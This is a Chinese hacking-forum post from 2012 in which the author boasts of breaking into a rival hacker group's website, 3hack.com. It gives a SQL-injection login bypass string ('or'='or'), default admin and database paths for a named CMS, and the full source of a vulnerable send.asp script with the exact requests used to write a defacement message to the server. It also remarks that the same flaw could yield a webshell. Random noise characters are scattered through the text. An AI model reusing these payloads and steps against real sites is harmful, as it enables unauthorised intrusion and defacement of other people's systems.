中国网络渗透测试联盟

标题: 入侵华东黑客联盟装X的过程 [打印本页]

---

作者: admin    时间: 2012-11-6 21:06
标题: 入侵华东黑客联盟装X的过程
有些朋友对我和云中鹰搞华东的过程比较感兴趣，其实那个很没技术含量
今天闲着无聊，把手上的项目葛一下，来论坛放松一下，顺便说说上次搞华东黑客联盟到装B的过程
这天云中鸡说华东的某人很牛X，利用JPG黑站大法把恶灵战队黑了，还发了个demo出来
; j5 T; v* Q5 Y7 Z我去看了一下demo，感觉很黑客，于是就和云中鸡搞了一下华东
首先，我记得华东只被人搞过一次（记性不好，原谅下~~），所以应该防护还是比较好的
服务器应该防ARP，不过这还只是猜测
+ D) n2 D; z/ J; C8 x# X0 t* P2 w# b2 w云中鸡说先不搞C段，PZ一下再说
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
* A0 N' M. r% `$ Y3 u* s一看，我晕，怎么网站变了................以前我比较喜欢到华东去看动画，现在怎么变成这鸟样了，晕..............
$ [* R8 S6 J2 x$ D- ?3 Z' }" N这时候云中鸡丢了一个同F的站过来，说进了后台搞不了shell
我看了下搞到了一个webshell出来（这里涉及点技巧，不过不是重点，故省略....），登上webshell后发现服务器的权限很BT
& \- l8 n. Z4 S然后我就把shell丢给云中鸡去提权，过了一会儿找到了一个二级玉米的站shop.xiahack.cn
看着是用eshop来架设的网店，虽然不是同F，但还是想搞下他看有什么可利用的地方，用了几个0day去搞发现不是最新版，0day用不鸟
" l. i' n, _  e- G9 p问了下云中鸡提权怎样了，他说还在努力，装不鸟B就不睡觉，晕了，这下入侵陷入了僵局...............
4 h* ~3 D0 q/ t- {- Q& U3 E无聊到网上乱逛，这时无意中发现一个阿拉伯XXXXXX，具体就不说啥鸟，呵呵~~
. v* W" x, r$ e: F4 F" j! m9 K然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑，于是我就去看看是什么
4 e' i0 F$ Z8 D( W9 B" n% c打开一看，如图1所示。

http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
我靠~~这啥东西？这么帅？点进去一看，如图2所示。

http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
太帅了，真YD！！
. Z9 _* y% H, @, Z0 U2 y# e这个页面应该是一套个人主页程序，而且还挺炫的！
这个页面有发表日志的地方，应该可能存在登陆页面，找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面，如图3所示。
0 _% X- N1 b1 P
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
. t& H. C9 Z7 K$ {+ s9 F3 Y嘿嘿，试着'or'='or'居然进去了！！如图4所示。
# R) }4 A7 p; W7 [7 O: R$ a6 T- ?- b
2 j  \# B' _/ \( Y http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
经过半个多小时的摸索，还是没有发现可利用的地方。
这下郁闷了，不管了，把这套程序下载下来看看吧
找了一会才知道这套程序叫做“V时代个人flash主页”
( a5 ~4 v% H+ A5 E: ~2 R到官方下了套最新版，然后找了一下可利用的地方，不一会，我发现“/html/admin”这个目录很可能可以利用
# N( w9 U5 m3 x于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]
返回的确实找不到页面，郁闷了，输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]
( O9 g  X! n, M. W- p同样是找不到页面，真晕！再看看！
5分钟过后，我发现后台地址是“/asp”，默认数据库是“/asp/vshidai.mdb”，嘿嘿！这下你不死定了！
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]]，我晕！服务器居然设置了mdb后缀映射，下载不了！
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]]，发现返回空白，这下我真是服了！
# R) A" j; g. b* ^希望快覆灭了，这时我点到了根目录下的send.asp文件，看到里面存在着一个有意思的东西，代码如下：
; q* l$ n4 b9 |7 F, N: L* J
var a
var b
- b1 o* E* b* J& z' a( zvar tx
var clean
a=Request("re")
clean=Request("clean")
, O& X' t) ^8 l; D* C4 lvar jian="test.txt"

if(clean==1){
6 w0 b5 v! |. }% \tx="&a="
var fs2
6 R" r, v/ c/ C1 [" S7 ovar fs2=Server.CreateObject("Scripting.FileSystemObject")
; T( d% E4 X6 i$ Q  ^' b2 D+ Vvar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
newdt.WriteLine("&a=")
3 a: v8 y/ _# Knewdt.close()
& D4 e- n3 R, y, d% Z, W& u}

if(clean==0|clean==1){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))
( l1 `4 ?; |  |3 q3 vwhile (!file.AtEndOfStream){
& U+ g( A5 F8 F, Z8 I" C2 vtx=file.ReadLine()
Response.write (tx)
}
8 H  D2 n* \1 b, u4 \2 ?% X0 J" TResponse.write ("&")
file.close()
}

! w0 F9 b& `' H! mif(clean==2){
; @8 B- G: G4 e2 O- g* o# @( Ftx=""
' a( Y" P3 c* [6 Ovar fso = Server.Createobject("Scripting.FileSystemObject")
/ Q; s& x. V& `* P# Avar file = fso.OpenTextFile(Server.Mappath(jian))
5 ?" v) H/ \4 `- |5 B. A8 r
9 v( _" X/ F0 A$ X: Kvar fs2
6 v% [" p+ v$ `var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)

8 a( K# h3 l+ T6 q9 m
while (!file.AtEndOfStream){
. S( r+ `" D& L0 c! L# G  Ptx=file.ReadLine()
Response.write (tx)}
- t% i6 r- ^) C0 a, S
1 N# Y/ V+ u" G/ `Response.write (a+"&")
newdt.WriteLine(a)
( j) a: ^  x+ d9 w$ N
4 B8 ^$ r& L0 _# K0 ^  K" V6 v" sfile.close()
, N5 \& C8 t/ [newdt.close()
}
+ B  ], v5 c; u* g/ m, R

0 v+ k0 Q1 |. C, Q复制代码
这下应该可以装B了！从代码看出，我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件，文件里面写着“&a=&”
- q) y' _) O9 n5 s- W' S# ]接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
* X0 r7 n8 J$ ]! e) L# M- X这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
3 o5 ~* b9 R1 o: @0 \过程如图5、6所示。

, d8 I) y3 X- t6 Ohttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
& }8 G, q- o- L  C9 _  
' {6 U6 i7 B; h/ { http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
6 x( s; [5 g5 X0 P5 Z& y提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看，如图7所示。
% ]3 e/ b- [0 f+ U  ~9 A- Z3 E9 [
0 R; N2 U( u7 E$ n  G1 i( E# b4 a http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
这下终于可以装到X了，如果不是V时代的作者写的send.asp代码存在问题，拿到shell是不难的
如果jian是经过request取值的话，同样也能搞到shell。
这次只是装到了X，并没有拿到shell
2 n* R  X" v3 p2 p$ c# {2 P. f# g1 }/ ^已经是凌晨了，跟云中J说了声就睡觉去鸟
估计那B可能搞到了权限，不过我没问他，最近事情比较多，也比较忙
  G' u& G/ j/ s, e$ H就到这里吧，没技术含量，纯粹装X，高手们见笑了
% n) {9 f" j- I/ o' m另外劝告某些认为上传个JPG就能黑到站的大黑客，你这样自欺欺人吃亏的是你自己
自己学不到技术，却还在自欺欺人
不说了，本文到这里，最后感谢一下阿拉伯黑客，原来阿拉伯黑客也是很强大的，好了，猪大家愉快~~
) B& R3 V. ?" x8 R4 }/ j
" m* T4 e+ U7 n/ w4 X6 x. P' e8 b

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2